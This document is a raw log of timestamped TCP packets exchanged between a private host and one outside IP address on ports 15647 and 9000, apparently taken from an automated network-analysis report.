Dec 17, 2024 08:39:12.266874075 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:12.346041918 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:12.346112967 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:12.445579052 CET	9000	49859	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:12.445678949 CET	9000	49859	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:12.445801020 CET	49859	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:12.445801973 CET	49859	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:12.509447098 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:12.511431932 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:12.511499882 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:12.550318956 CET	49864	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:12.563767910 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:12.565654039 CET	9000	49859	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:12.631227016 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:12.631289959 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:12.670047045 CET	9000	49864	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:12.670285940 CET	49864	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:12.670330048 CET	49864	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:12.703835964 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:12.703936100 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:12.751097918 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:12.790255070 CET	9000	49864	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:12.823534966 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:12.823714972 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:12.823802948 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:13.126246929 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:13.155235052 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:13.155322075 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:13.155380964 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:13.155610085 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:13.155666113 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:13.246268988 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:13.246329069 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:13.249567986 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:13.298161983 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:13.325510979 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:13.327975035 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:13.366148949 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:13.366224051 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:13.486112118 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:13.486210108 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:13.558511972 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:13.602480888 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:13.605943918 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:13.606055975 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:13.678390980 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:13.678534031 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:13.725754976 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:13.797564030 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:13.798230886 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:13.798495054 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:13.870481968 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:13.918210030 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:13.919035912 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:13.989685059 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:13.998016119 CET	9000	49864	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:13.998136997 CET	9000	49864	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:13.998214006 CET	49864	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:13.998258114 CET	49864	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:14.032620907 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:14.038877964 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:14.039514065 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:14.105730057 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:14.111258030 CET	49866	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:14.117930889 CET	9000	49864	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:14.157737017 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:14.159194946 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:14.159354925 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:14.230932951 CET	9000	49866	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:14.231070042 CET	49866	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:14.231084108 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:14.231184006 CET	49866	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:14.234297991 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:14.280031919 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:14.351825953 CET	9000	49866	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:14.352488995 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:14.352591991 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:14.354917049 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:14.471654892 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:14.472307920 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:14.472546101 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:14.592464924 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:14.592716932 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:14.664576054 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:14.665047884 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:14.712412119 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:14.784894943 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:14.785161018 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:14.786014080 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:14.897559881 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:14.897696972 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:14.904938936 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:14.985845089 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:15.017462015 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:15.017657042 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:15.097254992 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:15.097383022 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:15.137527943 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:15.209711075 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:15.210216045 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:15.217190981 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:15.329814911 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:15.329900980 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:15.330135107 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:15.449778080 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:15.449843884 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:15.522217035 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:15.559474945 CET	9000	49866	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:15.559541941 CET	9000	49866	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:15.559621096 CET	49866	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:15.559746027 CET	49866	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:15.563782930 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:15.569675922 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:15.569739103 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:15.673800945 CET	49872	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:15.876260042 CET	49866	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:15.876271963 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:16.168031931 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:16.168051004 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:16.168216944 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:16.168246984 CET	9000	49866	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:16.168297052 CET	49866	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:16.168425083 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:16.168442965 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:16.168464899 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:16.168504000 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:16.168574095 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:16.168613911 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:16.168634892 CET	9000	49866	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:16.168643951 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:16.168648958 CET	9000	49872	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:16.168724060 CET	49872	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:16.168764114 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:16.168775082 CET	9000	49866	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:16.168823004 CET	49866	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:16.168890953 CET	49872	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:16.288086891 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:16.288556099 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:16.289072990 CET	9000	49872	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:16.408370972 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:16.408473969 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:16.483323097 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:16.529681921 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:16.529890060 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:16.649653912 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:16.649832010 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:16.717784882 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:16.766916990 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:16.769754887 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:16.770037889 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:16.842545986 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:16.843781948 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:16.891796112 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:16.895771027 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:16.911719084 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:16.970102072 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:17.034069061 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:17.034646034 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:17.102173090 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:17.102636099 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:17.204164982 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:17.204241037 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:17.223763943 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:17.226228952 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:17.266876936 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:17.347086906 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:17.347794056 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:17.497010946 CET	9000	49872	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:17.497155905 CET	9000	49872	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:17.497250080 CET	49872	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:17.497292995 CET	49872	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:17.510427952 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:17.511775017 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:17.516359091 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:17.563826084 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:17.612025023 CET	49879	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:17.616985083 CET	9000	49872	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:17.631566048 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:17.631767988 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:17.659957886 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:17.704456091 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:17.731962919 CET	9000	49879	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:17.735718012 CET	49879	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:17.736926079 CET	49879	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:17.793508053 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:17.793586016 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:17.823823929 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:17.852364063 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:17.852602959 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:17.856631994 CET	9000	49879	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:17.913451910 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:17.972389936 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:17.974349976 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:18.016017914 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:18.063807011 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:18.094204903 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:18.094413996 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:18.105983019 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:18.157562971 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:18.257504940 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:18.257639885 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:18.286565065 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:18.286698103 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:18.377779007 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:18.378020048 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:18.406618118 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:18.406776905 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:18.454442978 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:18.478710890 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:18.532511950 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:18.553462029 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:18.553554058 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:18.598983049 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:18.599549055 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:18.673696041 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:18.719439030 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:18.719686985 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:18.839544058 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:18.839611053 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:18.841634035 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:18.841718912 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:19.001563072 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:19.001626015 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:19.031827927 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:19.063741922 CET	9000	49879	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:19.063927889 CET	9000	49879	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:19.064007044 CET	49879	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:19.064034939 CET	49879	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:19.079392910 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:19.121700048 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:19.121890068 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:19.151761055 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:19.151911020 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:19.173973083 CET	49880	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:19.183744907 CET	9000	49879	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:19.271605968 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:19.271759033 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:19.294008970 CET	9000	49880	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:19.294183016 CET	49880	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:19.294357061 CET	49880	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:19.314162016 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:19.360631943 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:19.413949966 CET	9000	49880	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:19.434082985 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:19.434158087 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:19.506326914 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:19.506423950 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:19.605525017 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:19.605648994 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:19.626147032 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:19.626209974 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:19.673218966 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:19.725567102 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:19.727900028 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:19.746313095 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:19.798293114 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:19.889487982 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:19.889636993 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:19.917730093 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:19.917812109 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:20.009459019 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:20.037683010 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:20.039843082 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:20.039961100 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:20.095057011 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:20.201776981 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:20.202198982 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:20.464818954 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:20.464853048 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:20.464914083 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:20.464920044 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:20.464963913 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:20.516885042 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:20.517429113 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:20.544326067 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:20.584861994 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:20.584925890 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:20.620064974 CET	9000	49880	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:20.620140076 CET	9000	49880	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:20.620348930 CET	49880	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:20.620521069 CET	49880	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:20.636698961 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:20.656585932 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:20.704480886 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:20.704691887 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:20.704821110 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:20.737082005 CET	49886	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:20.740183115 CET	9000	49880	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:20.824542046 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:20.824727058 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:20.848831892 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:20.849023104 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:20.856941938 CET	9000	49886	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:20.857055902 CET	49886	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:20.857188940 CET	49886	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:20.976871014 CET	9000	49886	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:20.985491991 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:20.985600948 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:21.016825914 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:21.016928911 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:21.040961981 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:21.095055103 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:21.105464935 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:21.136686087 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:21.136795044 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:21.208926916 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:21.251329899 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:21.256484985 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:21.256555080 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:21.297648907 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:21.345077038 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:21.429395914 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:21.429519892 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:21.448806047 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:21.448899984 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:21.549210072 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:21.549323082 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:21.568628073 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:21.626266003 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:21.709441900 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:21.709496975 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:21.741592884 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:21.782576084 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:21.829298019 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:21.829402924 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:21.861798048 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:21.907568932 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:21.987498045 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:21.987791061 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:22.053889036 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:22.110685110 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:22.149523973 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:22.149692059 CET	49796	15647	192.168.2.11	92.255.57.75
